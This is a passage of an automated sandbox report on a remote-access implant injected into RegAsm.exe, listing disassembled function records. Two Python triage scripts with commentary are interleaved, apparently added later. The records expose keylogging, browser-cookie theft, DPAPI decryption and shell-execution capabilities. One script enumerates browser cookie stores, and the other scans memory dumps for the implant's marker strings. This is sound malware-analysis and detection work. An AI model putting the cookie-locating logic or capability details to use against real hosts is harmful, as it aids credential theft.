                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcslen$CloseCreateValue
                          • String ID: !D@$okmode$PG
                          • API String ID: 3411444782-3370592832
                          • Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                          • Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                          APIs
                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                          Strings
                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                          • API String ID: 1174141254-1980882731
                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                          APIs
                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                          Strings
                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                          • API String ID: 1174141254-1980882731
                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
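The two records above show the implant probing for Chromium cookie databases with PathFileExistsW at "User Data\Default\Network\Cookies" and "User Data\Profile ?\Network\Cookies", where the "?" is the position into which a profile number is formatted. The Python below is an added triage example, not code from this report and not Remcos tooling: it expands those two templates the same way and reports which cookie stores exist under a base directory, so an analyst can see at a glance what an implant of this kind would find on a given host. The base directory, the upper bound on the profile index, and the sample directory layout are assumptions for the demonstration.

```python
import os
import tempfile

# Relative paths copied from the strings in the report; "?" marks where the
# implant formats in the profile index.
COOKIE_TEMPLATES = (
    r"User Data\Default\Network\Cookies",
    r"User Data\Profile ?\Network\Cookies",
)
MAX_PROFILE_INDEX = 20  # assumption: how far a probe loop is likely to count


def candidate_cookie_paths(base_dir, max_profile=MAX_PROFILE_INDEX):
    """Expand the two templates into concrete candidate paths under base_dir."""
    paths = []
    for template in COOKIE_TEMPLATES:
        rel = template.replace("\\", os.sep)
        if "?" in rel:
            for idx in range(1, max_profile + 1):
                paths.append(os.path.join(base_dir, rel.replace("?", str(idx))))
        else:
            paths.append(os.path.join(base_dir, rel))
    return paths


def find_cookie_stores(base_dir, max_profile=MAX_PROFILE_INDEX):
    """Return the candidates that exist, mirroring the PathFileExistsW checks."""
    return [p for p in candidate_cookie_paths(base_dir, max_profile) if os.path.isfile(p)]


def build_sample_layout(root):
    """Constructed sample: Default and Profile 3 hold a cookie DB, Profile 2 does not."""
    for rel in ("Default", "Profile 2", "Profile 3"):
        os.makedirs(os.path.join(root, "User Data", rel, "Network"), exist_ok=True)
    for rel in ("Default", "Profile 3"):
        with open(os.path.join(root, "User Data", rel, "Network", "Cookies"), "wb") as fh:
            fh.write(b"SQLite format 3\x00")  # header bytes only, a placeholder
    return root


def demo():
    """Build the sample layout in a temp dir and return the stores found, '/'-separated."""
    root = build_sample_layout(tempfile.mkdtemp())
    return [os.path.relpath(p, root).replace(os.sep, "/") for p in find_cookie_stores(root)]


if __name__ == "__main__":
    for rel in demo():
        print(rel)
```

Pointing find_cookie_stores at a real %LOCALAPPDATA%\Google\Chrome directory (or the equivalent for another Chromium-based browser) lists the stores that would be in scope for the theft routine; the Network\ subdirectory is where current Chromium builds keep the cookie database, which is why the implant probes that path rather than the profile root.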
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                          • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                          • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread$LocalTimewsprintf
                          • String ID: Offline Keylogger Started
                          • API String ID: 465354869-4114347211
                          • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                          • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                          APIs
                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread$LocalTime$wsprintf
                          • String ID: Online Keylogger Started
                          • API String ID: 112202259-1258561607
                          • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                          • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                          APIs
                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: CryptUnprotectData$crypt32
                          • API String ID: 2574300362-2380590389
                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                          • CloseHandle.KERNEL32(?), ref: 004051CA
                          • SetEvent.KERNEL32(?), ref: 004051D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandleObjectSingleWait
                          • String ID: Connection Timeout
                          • API String ID: 2055531096-499159329
                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                          APIs
                          • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                          • RegSetValueExW.ADVAPI32 ref: 00413888
                          • RegCloseKey.ADVAPI32(?), ref: 00413893
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: pth_unenc
                          • API String ID: 1818849710-4028850238
                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
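The function records above surface a handful of plaintext markers in the unpacked RegAsm.exe image: "Offline Keylogger Started" and "Online Keylogger Started" beside the CreateThread calls, "Connection Timeout" in the WaitForSingleObject routine, "okmode" and "pth_unenc" beside the HKEY_CURRENT_USER registry writes, and "CryptUnprotectData" where crypt32 is resolved. The Python below is an added triage example, not code from this report and not Remcos tooling: it scans a memory dump for those markers in both ASCII and UTF-16LE, because the records show both narrow (GetModuleFileNameA, RegSetValueExA) and wide (wsprintfW, RegSetValueExW) API variants and a marker can be stored either way. The sample dump is constructed, the three-marker threshold is an assumption, and the marker list is only the set visible on this page, not a complete signature for the family.

```python
import re

# Markers copied from the function records on this page. They are triage
# pivots for a memory dump, not a complete signature for the family.
MARKERS = (
    "Offline Keylogger Started",
    "Online Keylogger Started",
    "Connection Timeout",
    "pth_unenc",
    "okmode",
    "CryptUnprotectData",
    '/sort "Visit Time" /stext ',
)


def _compile_patterns():
    """Compile each marker as an ASCII and as a UTF-16LE byte pattern."""
    pats = []
    for marker in MARKERS:
        pats.append((marker, "ascii", re.compile(re.escape(marker.encode("ascii")))))
        pats.append((marker, "utf-16le", re.compile(re.escape(marker.encode("utf-16-le")))))
    return pats


PATTERNS = _compile_patterns()


def scan_dump(data):
    """Return {marker: [(offset, encoding), ...]} for every marker present in data."""
    hits = {}
    for marker, enc, pat in PATTERNS:
        for match in pat.finditer(data):
            hits.setdefault(marker, []).append((match.start(), enc))
    for positions in hits.values():
        positions.sort()
    return hits


def verdict(hits, threshold=3):
    """Flag the dump when at least `threshold` distinct markers were found (assumed cut-off)."""
    return len(hits) >= threshold


def build_sample_dump():
    """Constructed sample: filler bytes with four markers embedded in mixed encodings."""
    filler = b"\x00" * 16 + b"MZ\x90\x00" + b"\xcc" * 32  # 52 bytes
    return (
        filler
        + "Offline Keylogger Started".encode("utf-16-le")
        + filler
        + b"pth_unenc\x00"
        + filler
        + "Connection Timeout".encode("utf-16-le")
        + filler
        + b"crypt32\x00CryptUnprotectData\x00"
        + filler
    )


if __name__ == "__main__":
    found = scan_dump(build_sample_dump())
    for marker, where in found.items():
        print(marker, where)
    print("flagged:", verdict(found))
```

Run scan_dump over the raw bytes of a dumped region (for instance the 0x400000 image referenced in the Memory Dump Source lines) to get offsets that can be pivoted back to the functions listed here; the encoding tag tells you whether to expect the narrow or wide API family around the reference.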
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                          • String ID: bad locale name
                          • API String ID: 3628047217-1405518554
                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeHandleLibraryModule
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 662261464-1276376045
                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                          • ShowWindow.USER32(00000009), ref: 00416C9C
                          • SetForegroundWindow.USER32 ref: 00416CA8
                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                          • String ID: !D@
                          • API String ID: 186401046-604454484
                          • Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                          • Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: /C $cmd.exe$open
                          • API String ID: 587946157-3896048727
                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                          APIs
                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.|,004752F0,?,pth_unenc), ref: 0040B8F6
                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: TerminateThread$HookUnhookWindows
                          • String ID: pth_unenc
                          • API String ID: 3123878439-4028850238
                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                          APIs
                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetCursorInfo$User32.dll
                          • API String ID: 1646373207-2714051624
                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                          APIs
                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetLastInputInfo$User32.dll
                          • API String ID: 2574300362-1519888992
                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                          • __freea.LIBCMT ref: 100087D5
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
